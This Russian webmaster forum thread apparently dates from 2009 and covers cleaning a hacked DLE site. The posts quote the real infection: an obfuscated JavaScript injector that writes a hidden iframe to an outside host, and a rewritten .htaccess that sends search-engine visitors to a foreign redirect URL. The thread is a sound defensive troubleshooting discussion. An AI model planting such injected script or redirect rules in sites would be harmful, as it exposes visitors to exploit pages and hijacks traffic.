вирус достал просто

[Удален]
638

Не буду показывать сайт, расскажу суть дела.

Сейчас ходит вирус по дле сайтам, заражает индекс файлы ифреймом.

Но у меня дела обстоят немного иначе.

Сайт работает, но при просмотре любой новости меня пересылает на эксплойт.

Заменял основные файлы, проверил некоторые, вроде всё нормально.

Кто нибудь сталкивался?

я уже сутки сижу, не врубаюсь вообще, помогайте , ребята.

fable543
На сайте с 01.12.2007
Offline
175
#1
Broox:
Не буду показывать сайт, расскажу суть дела.

Сейчас ходит вирус по дле сайтам, заражает индекс файлы ифреймом.

Но у меня дела обстоят немного иначе.

Сайт работает, но при просмотре любой новости меня пересылает на эксплойт.

Заменял основные файлы, проверил некоторые, вроде всё нормально.

Кто нибудь сталкивался?

я уже сутки сижу, не врубаюсь вообще, помогайте , ребята.

Анологичная ситуация была и у меня с моими сайтами. Устал чистить если честно.

1) Не храните пароли от FTP на своем ПК

2) Не храните пароли на почте

3) Не давайте доступы третьим лицам.

Избавиться от него можно только тогда когда ПК нормально защищен, хороший антивирус, файервол. Снести вирусный код с index.php , еще заселяется в пути : engine/inc/main.php

- сидит после окончания кода </html>, в самом низу страницы.

Куплю постовые от 20 руб, пресс-релизы от 50 руб, места под статьи цена договорная, твиты и google +
[Удален]
#2
Избавиться от него можно только тогда когда ПК нормально защищен, хороший антивирус, файервол. Снести вирусный код с index.php , еще заселяется в пути : engine/inc/main.php

- сидит после окончания кода </html>, в самом низу страницы.

0

нету в обойх этих файлах.

происходит примерно так это дело.

Перехожу в подробную новость >> ошиька 404, документ не найде >> через 1 секунду рефреш и редирект на эксплойт

fable543
На сайте с 01.12.2007
Offline
175
#3
Broox:
0
нету в обойх этих файлах.

происходит примерно так это дело.

Перехожу в подробную новость >> ошиька 404, документ не найде >> через 1 секунду рефреш и редирект на эксплойт

киньте в личку сайт.

OnArs
На сайте с 09.11.2008
Offline
87
#4

Не обяхательно после </html>

Самый простой способ открывать каждый файл руками и с помощью поиска искать вхождение слова: "iframe"

У меня заразил файлы с именем index.(php,html,asp,shtml,htm и прочие).

Сам намучился :(

Удачной чистки!

[Удален]
#5

вот какая у меня батва в исходном коде "несуществующей" страницы, там, где должна быть новость

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY><!-- ad --><SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.2">document.write(unescape('')+String.fromCharCode(60)+''+String.fromCharCode(105)+String.fromCharCode(102)+''+unescape('%72%61')+unescape('%6D%65%20%69')+unescape('%64%3D%22%61')+String.fromCharCode(99)+String.fromCharCode(98)+''+'e'+unescape('%38%36%63%37')+String.fromCharCode(97)+''+'b7d5'+unescape('%63%39%34%65')+'694'+'cc64'+'317'+unescape('%33')+unescape('%33%32%30%38')+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(110)+String.fromCharCode(97)+''+'me='+'"5'+unescape('%61%32%34')+'b'+unescape('%35%61%38')+unescape('%61%36')+String.fromCharCode(54)+String.fromCharCode(56)+String.fromCharCode(50)+''+'6c22'+String.fromCharCode(99)+String.fromCharCode(50)+''+'6'+String.fromCharCode(52)+String.fromCharCode(50)+String.fromCharCode(49)+''+String.fromCharCode(57)+String.fromCharCode(52)+String.fromCharCode(51)+''+'ee'+unescape('%35')+String.fromCharCode(52)+String.fromCharCode(99)+String.fromCharCode(52)+String.fromCharCode(34)+''+unescape('%20%20')+unescape('%77%69')+String.fromCharCode(100)+String.fromCharCode(116)+''+'h='+String.fromCharCode(49)+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+''+'ight'+String.fromCharCode(61)+String.fromCharCode(49)+String.fromCharCode(32)+String.fromCharCode(102)+''+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+''+String.fromCharCode(98)+String.fromCharCode(111)+''+unescape('%72%64%65%72')+unescape('%3D%30%20')+'sr'+'c="h'+'ttp'+':/'+'/bi'+unescape('%7A%6F')+unescape('%70%6C')+'at'+'a.ru'+unescape('%2F%70%61')+String.fromCharCode(121)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+''+unescape('%6D%6C%22%3E')+'</if'+'r'+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(62)+''+'');</SCRIPT><!-- /ad -->
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at ad21.ru
</ADDRESS>
</BODY>
</HTML>

<!--
- Unfortunately, Microsoft has added a clever new
- "feature" to Internet Explorer. If the text of
- an error's message is "too small", specifically
- less than 512 bytes, Internet Explorer returns
- its own error message. You can turn that off,
- but it's pretty tricky to find switch called
- "smart error messages". That means, of course,
- that short error messages are censored by default.
- IIS always returns error messages that are long
- enough to make Internet Explorer happy. The
- workaround is pretty simple: pad the error
- message with a big comment like this to push it
- over the five hundred and twelve bytes minimum.
- Of course, that's exactly what you're reading
- right now.
-->

Broox добавил 21.02.2009 в 19:04

разобрался

Файл .htacasses был переписан.

Вот что в нем было

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://_sotoviy.info/0/go.php?sid=3 [R,L]
Vizavi
На сайте с 31.08.2008
Offline
145
#6
OnArs:
Не обяхательно после </html>
Самый простой способ открывать каждый файл руками и с помощью поиска искать вхождение слова: "iframe"
У меня заразил файлы с именем index.(php,html,asp,shtml,htm и прочие).

у вас как раз программа поработала, massiframer.

вставляет код или в начало или в конец страницы.

Большой брат следит за тобой.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий